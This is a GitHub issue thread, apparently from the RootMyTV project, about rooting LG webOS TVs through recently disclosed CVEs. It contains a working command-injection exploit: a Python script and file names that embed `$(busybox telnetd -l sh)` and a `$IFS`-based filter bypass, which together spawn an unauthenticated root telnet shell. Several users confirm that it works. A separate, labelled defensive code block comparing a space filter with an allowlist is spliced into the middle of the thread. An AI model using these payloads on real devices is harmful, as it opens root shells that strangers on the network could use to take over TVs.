RootMyTV.github.io
Recent exploits
I wonder if it's enough for a RootMyTV v3...
https://www.cve.org/CVERecord?id=CVE-2023-6317
https://www.cve.org/CVERecord?id=CVE-2023-6318
https://www.cve.org/CVERecord?id=CVE-2023-6319
https://www.cve.org/CVERecord?id=CVE-2023-6320
Source: https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos/
Thanks, this does actually sound extremely usable. Iff we're going to do a v3 release, we should probably prioritize using these bugs since they're already known to LG. (we were also aware of some of these bugs already ;) )
Btw do you have a source for the in-the-wild exploitation? It doesn't exactly matter for our purposes but I'd be interested to know more.
> Btw do you have a source for the in-the-wild exploitation? It doesn't exactly matter for our purposes but I'd be interested to know more.
I have misinterpreted the news. My apologies! What I meant to say was that the exploits were discovered by Bitdefender researchers, which could potentially attract the attention of malicious actors. As a security researcher, I'll keep an eye out! 👀
Cheers and my apologies again!
Can confirm that CVE-2023-6319 (getAudioMetadata) works on my LG OLED C1 with webOS 6.0 (03.36.50), managed to successfully get root and install the homebrew app, I've also tried CVE-2023-6318 (processAnalyticsReport) but it didn't seem to work.
In case it helps, all I did was `scp` an MP3 and an LRC file as described in the article to `/media/developer/temp/` using the LG developer mode SSH server with names like `myaud_$(busybox telnetd -l sh).mp3`, then ran this Python script:
```python
import asyncio
from aiopylgtv import WebOsClient

HOST = "TV_IP_ADDR"


async def main():
    client = await WebOsClient.create(HOST)
    await client.connect()

    await client.luna_request("com.webos.service.attachedstoragemanager/getAudioMetadata", {
        "deviceId": "0bcef",
        "fullPath": "/media/developer/temp/myaud_$(busybox telnetd -l sh).mp3"
    })

    await client.disconnect()


if __name__ == "__main__":
    asyncio.run(main())
```
I've also tried to make an all-in-one script using `com.webos.service.downloadmanager/download` to push the files to the filesystem, but it blocks URLs with spaces in the name, so if anyone has a workaround then please let me know.
@illixion I haven't tried against my TV at all but I think you'll find you can bypass the need for spaces entirely by replacing them with `$IFS`, i.e. `"/media/developer/temp/myaud_$(busybox$IFStelnetd$IFS-l$IFSsh).mp3"` (again, untested!)
@DavidBuchanan314 that's genius, thank you for suggesting this, after some trial and error I've landed on `/mnt/lg/appstore/internal/downloads/myaud_$(telnetd$IFS-lsh).mp3` which does work! I'll post a guide along with an updated script on my blog for those who are interested.
Edit: now published: https://blog.illixion.com/2024/04/root-lg-webos-tv/
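For defenders reading this exchange, an added example (not part of the thread and not code from LG or any project mentioned here) showing why a filter that only rejects spaces does not stop shell expansion in a file name, next to an allowlist and a shell-free argument list. The tool name `metadata-tool` and the directory `/media/in` are hypothetical, and the sample names are the ones quoted in this thread plus two constructed ones.

```python
import re

# Sample names: two constructed benign ones, then the two quoted in this thread.
SAMPLES = [
    "holiday song.mp3",
    "track01.mp3",
    "myaud_$(busybox telnetd -l sh).mp3",
    "myaud_$(telnetd$IFS-lsh).mp3",
]

def naive_space_filter(name: str) -> bool:
    """Blocklist modelled on the behaviour reported above: reject only spaces."""
    return " " not in name

# Allowlist: letters, digits, dot, underscore, hyphen; no leading '-' or '.'.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9._-]{0,127}")

def allowlist_filter(name: str) -> bool:
    """Accept only names made entirely of characters with no shell meaning."""
    return SAFE_NAME.fullmatch(name) is not None

def shell_would_expand(name: str) -> bool:
    """True if the name holds syntax a POSIX shell expands even inside double quotes."""
    return bool(re.search(r"\$\(|`|\$\{|\$[A-Za-z_]", name))

def safe_argv(tool: str, directory: str, name: str) -> list:
    """Argument list for subprocess.run(argv) with no shell: the name stays one inert argument."""
    if not allowlist_filter(name):
        raise ValueError(f"rejected file name: {name!r}")
    return [tool, "--", f"{directory}/{name}"]

def audit(names):
    """Per name: (name, passes space filter, passes allowlist, shell would expand it)."""
    return [(n, naive_space_filter(n), allowlist_filter(n), shell_would_expand(n))
            for n in names]

if __name__ == "__main__":
    for row in audit(SAMPLES):
        print(row)
    print(safe_argv("metadata-tool", "/media/in", "track01.mp3"))
```

The `$IFS` form passes the space filter while still being expandable by a shell, which is why validation has to be an allowlist and the path has to reach the helper as a separate argument rather than inside a command string.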
> @DavidBuchanan314 that's genius, thank you for suggesting this, after some trial and error I've landed on `/mnt/lg/appstore/internal/downloads/myaud_$(telnetd$IFS-lsh).mp3` which does work! I'll post a guide along with an updated script on my blog for those who are interested.
Looking forward to that post. Great work.
Edit: now published: https://blog.illixion.com/2024/04/root-lg-webos-tv/
@illixion can confirm your script working on my TVs:
- webOS 7.3.1-39 03.33.65 (OLED42C21LA)
- webOS 7.3.1-43 03.33.85 (75NANO756QA)
Moved to https://github.com/illixion/root-my-webos-tv/issues/1#issuecomment-2060980484.
tl;dr - webOS version 05.40.20 doesn't work for me.
@illixion does not seem to work on 😞 webOS 7.3.1-42 03.33.80 (43UQ80009LB)
Is it possible to update to a specific version? I.e. 7.3.1-43? Would not want to let my TV do it on its own...
Please create issues related to my script in its repo instead of here, so we can have everything documented and categorized in one place: https://github.com/illixion/root-my-webos-tv
For all of that is a bit too heavy. Just to be clear. There is "still" no way (not counting the hardware method, since I do not understand there anything at all) to root a TV with 6.10.30 firmware, right?
> For all of that is a bit too heavy. Just to be clear. There is "still" no way (not counting the hardware method, since I do not understand there anything at all) to root a TV with 6.10.30 firmware, right?
Recently discovered https://github.com/throwaway96/dejavuln-autoroot should work